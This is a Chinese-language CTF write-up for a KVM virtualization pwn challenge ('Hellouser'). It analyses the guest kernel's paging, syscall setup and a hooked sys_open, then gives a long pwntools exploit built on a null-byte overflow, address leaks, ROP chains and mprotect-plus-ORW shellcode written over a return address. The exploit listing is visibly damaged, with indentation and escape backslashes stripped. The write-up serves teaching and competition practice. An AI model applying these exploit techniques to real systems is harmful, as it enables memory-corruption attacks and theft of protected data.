static int hp_handle_exit(VM *vm) {
int status = FETCH_U32;
fprintf(stderr, "+++ exited with %d +++ ", status);
exit(0);
}

/* NR_HP_panic: print a guest-supplied message and abort */
static int hp_handle_panic(VM *vm) {
uint32_t offset = FETCH_U32;
fprintf(stderr, "[e[31mPANICe[0m] %s ", MEM_AT(offset));
exit(1);
return -1;
}

kernel

首先是 entry.s,取出参数,然后调用 kernel_main函数,此外就会一直循环 hlt

1
2
3
4
5
6
7
8
9
10
/* Kernel entry stub: the hypervisor placed argc at [rsp] and the argv
 * array just above it (see copy_argv).  Hand both to kernel_main, then
 * halt forever if it ever returns. */
.globl _start, hlt
.extern kernel_main
.intel_syntax noprefix
_start:
mov rdx, [rsp] /* argc */
lea rcx, [rsp + 8] /* argv */
call kernel_main
hlt:
hlt
jmp hlt

kernel_main

先初始化了页表,然后初始化了内存分配器,根据源码得到 KERNEL_BASE_OFFSET=0x8000000000,然后注册了系统调用,最终切换用户。

1
2
3
4
5
6
7
8
/*
 * kernel_main — guest kernel entry (called from entry.s).
 * addr/len describe the free physical region handed over by the
 * hypervisor in rdi/rsi; argc/argv were pushed onto the kernel stack.
 * Sets up paging and the allocator, registers the syscall entry, then
 * drops to user mode and never meaningfully returns.
 */
int kernel_main(void* addr, uint64_t len, uint64_t argc, char *argv[]) {
init_pagetable();
/* new paging enabled! */
// the allocator works on the high (0x8000000000-based) kernel mapping
init_allocator((void*) ((uint64_t) addr | KERNEL_BASE_OFFSET), len);
if(register_syscall() != 0) return 1;
switch_user(argc, argv);
return 0;
}

init_pagetable

主要完成的也是页表映射功能,是做一个0x8000000000 ~ 0x8002000000到0 ~ 0x2000000的地址映射

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Maps
* 0x8000000000 ~ 0x8002000000 -> 0 ~ 0x2000000
*/
void init_pagetable() {
uint64_t* pml4;
// read CR3: guest-physical address of the PML4 the hypervisor built
asm("mov %[pml4], cr3" : [pml4]"=r"(pml4));
// place a new PDP/PD after the hypervisor's tables (PML4+0x1000,
// PDP+0x1000 are already in use)
uint64_t* pdp = (uint64_t*) ((uint64_t) pml4 + 0x3000);
pml4[1] = PDE64_PRESENT | PDE64_RW | (uint64_t) pdp; // 0x8000000000
uint64_t* pd = (uint64_t*) ((uint64_t) pdp + 0x1000);
pdp[0] = PDE64_PRESENT | PDE64_RW | (uint64_t) pd;
// 0x10 huge-page entries (PDE64_PS); assumes KERNEL_PAGING_SIZE is
// 0x200000 (2 MiB), giving 0x2000000 bytes total — TODO confirm
for(uint64_t i = 0; i < 0x10; i++)
pd[i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (i * KERNEL_PAGING_SIZE);
}

init_allocator

设置内存分配,调用时init_allocator((const char *)(addr | 0x8000000000i64), len);。所以arena.top就是0x8000000000。现在应该可以得出结论,内存映射:0x8000000000~0x8002000000到0x0~0x2000000。

1
2
3
4
5
6
7
/*
 * init_allocator — seed the kernel heap ("arena") with the free region
 * handed over by the hypervisor.  len must be non-zero and 4 KiB
 * aligned; panics otherwise.
 */
void init_allocator(void *addr, uint64_t len) {
if(len == 0 || (len & 0xfff) != 0) panic("kmalloc.c#init_allocator: invalid length");

arena.top = addr;
arena.top_size = len;
// start with empty free bins
memset(&arena.sorted_bin, 0, sizeof(arena.sorted_bin));
}

register_syscall

使用 wrmsr 写模型特定寄存器(MSR, Model Specific Register)。对于 WRMSR 指令,把要写入的信息存入 (EDX:EAX) 中,执行写指令后,即可将相应的信息存入 ECX 指定的 MSR 中。MSR 总体来说是为了设置 CPU 的工作环境和标示 CPU 的工作状态,包括温度控制、性能监控等。而此部分代码,主要是注册了 syscall,包括 syscall 的入口等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#define MSR_STAR 0xc0000081 /* legacy mode SYSCALL target */
#define MSR_LSTAR 0xc0000082 /* long mode SYSCALL target */
#define MSR_CSTAR 0xc0000083 /* compat mode SYSCALL target */
#define MSR_SYSCALL_MASK 0xc0000084

/*
 * register_syscall — program the syscall MSRs via wrmsr (each wrmsr
 * writes EDX:EAX into the MSR selected by ECX):
 *  - MSR_STAR: kernel/user segment selector bases (EDX = 0x00200008)
 *  - MSR_SYSCALL_MASK: RFLAGS bits cleared on syscall entry (0x3f7fd5)
 *  - MSR_LSTAR: syscall entry point — low half from the address of
 *    syscall_entry, high half from KERNEL_BASE_OFFSET.
 * NOTE(review): "mov rdx, %[base] >> 32" relies on the "i" constraint
 * substituting a compile-time constant — confirm against the original
 * source that this assembles as intended.
 */
int register_syscall() {
asm(
"xor rax, rax;"
"mov rdx, 0x00200008;"
"mov ecx, %[msr_star];"
"wrmsr;"

"mov eax, %[fmask];"
"xor rdx, rdx;"
"mov ecx, %[msr_fmask];"
"wrmsr;"

"lea rax, [rip + syscall_entry];"
"mov rdx, %[base] >> 32;"
"mov ecx, %[msr_syscall];"
"wrmsr;"
:: [msr_star]"i"(MSR_STAR),
[fmask]"i"(0x3f7fd5), [msr_fmask]"i"(MSR_SYSCALL_MASK),
[base]"i"(KERNEL_BASE_OFFSET), [msr_syscall]"i"(MSR_LSTAR)
: "rax", "rdx", "rcx");
return 0;
}

switch_user

switch_user 函数先利用 add_trans_user转到用户态,然后调用 sys_execve执行了用户态程序。

1
2
3
4
5
6
7
8
9
10
11
12
13
/*
 * switch_user — copy argc/argv into a user-accessible page, then
 * execve argv[0] in user mode via sys_execve.
 */
void switch_user(uint64_t argc, char *argv[]) {
// span from the start of the argv array through the end of the last string
int total_len = (argv[argc - 1] + strlen(argv[argc - 1]) + 1) - (char*) argv;
/* temporary area for putting user-accessible data */
char *s = kmalloc(total_len, MALLOC_PAGE_ALIGN);
uint64_t sp = physical(s);
add_trans_user((void*) sp, (void*) sp, PROT_RW); /* sp is page aligned */

/* copy strings and argv onto user-accessible area */
// rebase each argv pointer so it stays valid at the new location
for(int i = 0; i < argc; i++)
argv[i] = (char*) (argv[i] - (char*) argv + sp);
memcpy(s, argv, total_len);
sys_execve(argv[0], (char**) sp, (char**) (sp + argc * sizeof(char*)));
}

syscall系统调用表分析

由于 Kernel 都会对 系统调用进行一些特殊处理,所以我们对各个 syscall系统函数进行分析,首先就要找到 syscall_table

首先有一个 标志函数 syscall_entry,其特点是开始和结尾进行了很长的 push操作,这可以作为我们很快找到 syscall_entry 的标志。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* syscall entry point (installed in MSR_LSTAR): swap to the kernel
 * stack, save the caller-clobbered registers, call the C handler, then
 * restore and return to user mode. */
syscall_entry:
/* switch from the user stack to the kernel stack */
mov [rip + user_stack], rsp
mov rsp, [rip + kernel_stack]
/* save non-callee saved registers */
push rdi
push rsi
push rdx
push rcx
push r8
push r9
push r10
push r11
 
/* the fourth argument: syscall passes it in r10, the C ABI in rcx */
mov rcx, r10
call syscall_handler

pop r11
pop r10
pop r9
pop r8
pop rcx
pop rdx
pop rsi
pop rdi

/* back to the user stack.
 * NOTE(review): the trailing "c" below looks like an extraction
 * artifact — compare with the original source. */
mov rsp, [rip + user_stack]c
/* 0x48 is a REX.W prefix: combined with sysret this encodes sysretq,
 * the 64-bit return to user mode */
.byte 0x48
sysret

然后再进入 syscall_handler 函数,可以看到这里就出现了 syscall_table,然后通过 switch case 跳转。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
/*
 * syscall_table — maps syscall numbers (SYS_*) to the kernel's sys_*
 * implementations.  Unlisted entries stay NULL; note execve is
 * deliberately commented out.
 */
static const void* syscall_table[MAX_SYS_NR + 1] = {
/* expands to e.g. [SYS_read] = sys_read */
#define ENTRY(f) [SYS_##f]=sys_##f

ENTRY(read),
ENTRY(write),
ENTRY(open),
ENTRY(close),
ENTRY(fstat),
ENTRY(mmap),
ENTRY(mprotect),
ENTRY(munmap),
ENTRY(brk),
ENTRY(writev),
ENTRY(access),
/* ENTRY(execve), */
ENTRY(exit),
ENTRY(arch_prctl),
ENTRY(fadvise64),
ENTRY(exit_group),
ENTRY(openat),

#undef ENTRY
};


uint64_t syscall_handler(
uint64_t arg0, uint64_t arg1, uint64_t arg2,
uint64_t arg3, uint64_t arg4, uint64_t arg5) {

uint32_t nr;
asm("mov %[nr], eax;"
: [nr] "=r"(nr)
);
char *sys = 0;
switch(nr) {
case 0: sys = "read"; break;
case 1: sys = "write"; break;
case 2: sys = "open"; break;
case 3: sys = "close"; break;
...

最终,我们就可以在 Kernel中找到 系统调用表。

User

用户态的程序就和正常的 pwn题一样可以直接在我们本机上运行,在此不做过多分析。

Hellouser

程序分析

Hellouser的总体逻辑和 helloheap很相似,但是更为简单。

但是,由于是在自己的 kernel 里跑的,所以其 syscall 或者 系统调用都做了新的处理。但是 Kernel 里有一个很重要的点是,没有开启 NX,也就是数据执行保护,我们可以执行任意 shellcode。

利用分析

首先分析单独一个用户态程序的利用:

  1. 修改 edit_flag 和 backdoor_flag

首先执行 后门函数,泄露 plt地址,得到edit_flag的地址。由于修改 第10个块name时,存在一个 一字节 null 溢出,通过这个溢出可以修改第9块的 slogan_addr,我们将 slogan_addr修改为 edit_flag的地址。最后通过第9块即可修改 edit_flag 和 backdoor_flag 的值。自此,我们即可依次泄露 stack 和 libc 的地址,同时实现任意地址读写。

此时,我们在本机执行ORW是可以成功的,但是加上虚拟化后执行会失败。因此我们就需要分析内核对于orw 等各类系统调用是否做了修改

  1. Virtual分析

image-20201027093854548

可以看到未设置 EFER 寄存器的 NXE 位,所以可以直接执行 shellcode

  1. Kernel分析

首先我们按照上面所讲的标志,可以找到 Kernel中的 syscall_table

image-20201026213456176

然后,我们即可找到对应的 ORW函数了,我们可以看到 sys_open函数:

image-20201026213627715

当检测到 打开的文件名是 flag时,其会执行一个 hook函数,而不是执行正常的流程。

image-20201026214135430

hook 的主要流程是使用 hp_read 函数读取 flag 到内存中,然后调用 mprotect 函数修改了该内存为只写。所以,我们的方法应该是先调用 mprotect 将这块内存的保护方式改为可读可写,然后使用 ORW 将这块内存的内容读取出来。这里由于未开启 NX,可以直接执行 shellcode。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
# Exploit for the "Hellouser" KVM challenge (pwntools, Python 2 —
# note the `print` statements).
# NOTE(review): this listing was damaged by extraction — the
# indentation of all function/if bodies and the backslashes of escape
# sequences (e.g. '/bin/sh\x00' shown as '/bin/shx00') have been
# stripped; it is not runnable as shown.  Comments below annotate the
# intended logic only.
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

# debug=1: run user binary natively; debug=2: run under the hypervisor
debug = 2
if debug == 1:
p = process('./hellouser')
elf = ELF('./hellouser')
libc = ELF('./libc.so')
elif debug == 2:
p = process(['./hellovirtual','./hellokernel','./ld.so.2','./hellouser'])
elf = ELF('./hellouser')
libc = ELF('./libc.so.6')
else:
p = remote('')

# menu option 1: allocate a team chunk (name + slogan of given size)
def add(size, name=b"1 ", content=b"1"):
p.sendlineafter("your choice:", "1")
p.sendafter("team name:", name)
p.sendlineafter("slogan size:", str(size))
p.sendafter("team slogan:", content)


# menu option 2: free a team chunk
def delete(index):
p.sendlineafter("your choice:", "2")
p.sendlineafter("team id:", str(index))


# menu option 3: rewrite a team's slogan
def edit_content(index, content):
p.sendlineafter("your choice:", "3")
p.sendlineafter("your team id:", str(index))
p.sendlineafter("new slogan:", content)


# menu option 4: rewrite a team's name (has the one-byte NUL overflow)
def edit_name(index, name):
p.sendlineafter("your choice:", "4")
p.sendlineafter("your team id:", str(index))
p.sendafter("new name:", name)


# hidden option 4919: leak stack / code / libc addresses
def magic(index, magic_index):
magic_dic = ["stackbase", "codebase", "libcbase"]
p.sendlineafter("your choice:", "4919")
p.sendlineafter("your team id:", str(index))
p.sendlineafter("do you want?", magic_dic[magic_index])

# main exploit: NUL-overflow chunk 9's slogan pointer, point it at
# edit_flag/backdoor_flag, leak code/libc/stack, then write a
# mprotect+ORW shellcode stager over the saved return address.
def pwn():
name = 'a'
p.sendafter("you name:)", name)
add(0x68, '1', cyclic(29)) # chunk0
for i in range(5): # 1-5
add(0x20, '1', cyclic(29))

add(0x70, '1', cyclic(29)) # 6
add(0x100, '/bin/shx00', cyclic(29)) # 7
add(0x80, '1', cyclic(29)) # 8
add(0x68, '1', cyclic(29)) # 9
# cover slogan chunk->chunk_str1

add(0x68, b'1', cyclic(29)) # 10
#gdb.attach(p, 'bp $rebase(0x1399)')
edit_name(10, cyclic(29))

# leak the program base via the magic menu
magic(10, 1)
p.recvuntil('[+]code: ')
code_addr = p.recvuntil(' ', drop=True)
plt_base = int(code_addr, 16) - 0xcba
print 'code_addr',code_addr,'plt_base:',hex(plt_base)

#change edit_flag and backdoor_flag
edit_flag = plt_base + 0x2030b8
edit_content(10, p64(edit_flag)+p64(0x100)[:7])
payload = p32(20) + p32(1)
edit_content(9, payload) #9

# leak libc via stdout
magic(10, 2)
p.recvuntil('[+]libc: ')
libc_addr = p.recvuntil(' ', drop=True)
libc_base = int(libc_addr, 16) - libc.sym['_IO_2_1_stdout_']
print 'libc_addr',libc_addr,'libc_base:',hex(libc_base)

payload = p32(20) + p32(1)
edit_content(9, payload)

# leak a stack address; +0x48 reaches the saved return address
magic(10, 0)
p.recvuntil('[+]stack: ')
stack_addr = p.recvuntil(' ', drop=True)
ret_addr = int(stack_addr, 16) + 0x48
# stack_base = stack_addr & 0xfffffffff000
# print 'stack_base:',hex(stack_base)
print 'stack_addr',stack_addr,'ret_addr:',hex(ret_addr)

payload = p32(20) + p32(1) + './flagx00x00'
edit_content(9, payload)

libc.address = libc_base
print hex(libc.address)
# gadget offsets (same libc in both modes here)
if debug == 1:
p_rdi_r = 0x2155f + libc.address
p_rsi_r = 0x23e8a + libc.address
p_rdx_r = 0x1b96 + libc.address
p_rax_r = 0x43a78 + libc.address
syscall = 0xd29d5 + libc.address
else:
p_rdi_r = 0x2155f + libc.address
p_rsi_r = 0x23e8a + libc.address
p_rdx_r = 0x1b96 + libc.address
p_rax_r = 0x43a78 + libc.address
syscall = 0xd29d5 + libc.address

flag_str_addr = edit_flag+8
flag_addr = plt_base + 0x203500
stack_addr = ret_addr+ 0x90

# protect = flat([
# p_rdi_r, stack_base,
# p_rsi_r, 0x1000,
# p_rdx_r, 7,
# p_rax_r, 10,
# syscall
# ])

# ROP alternative: mprotect(0x1000, 0x1000, 7) then read a 2nd stage
rop = flat([
p_rdi_r, 0x1000,
p_rsi_r, 0x1000,
p_rdx_r, 7,
p_rax_r, 10,
syscall,
p_rdi_r, 0,
p_rsi_r, stack_addr,
p_rdx_r, 0x200,
p_rax_r, 0,
syscall
])

# ROP alternative: classic open/read/write of the flag
orw2 = flat([
p_rdi_r, flag_str_addr,
p_rsi_r, 0,
p_rax_r, 2,
syscall,
p_rdi_r, 3,
p_rsi_r, flag_addr,
p_rdx_r, 0x30,
p_rax_r, 0,
syscall,
p_rdi_r, 1,
p_rsi_r, flag_addr,
p_rdx_r, 0x30,
p_rax_r, 1,
syscall
])

# used path (NX is off): open("flag") triggers the kernel hook which
# reads the flag into write-only memory; mprotect(rax, 0x1000, 7)
# makes it readable, then write it to stdout
shellcode = asm(shellcraft.open("flag",0,0))
shellcode += asm('''
mov rbp, rax
mov rdi, rbp
mov rsi, 0x1000
mov rdx, 7
mov rax, 0xa
syscall
mov rdi, 1
mov rsi, rbp
mov rdx, 0x30
mov rax, 1
syscall
''')

gdb.attach(p, 'bp $rebase(0x1399)')
# point chunk 9's slogan pointer at the saved return address ...
edit_content(10, p64(ret_addr))
print 'getshell================>'
# edit_content(9, str(rop))
# p.sendline(str(orw2))
# ... then overwrite it with [ret_addr+8, shellcode] so the function
# return lands directly in the shellcode
payload = p64(ret_addr+8)+shellcode
edit_content(9, payload)
p.interactive()

pwn()

参考

KVM虚拟化原理探究

HITCON 2018 Abyss WriteUp

HITCON 2018 Abyss 源码

Escape from Stack VM: HITCON 2018 Abyss I

原文地址:https://www.cnblogs.com/dream397/p/14281417.html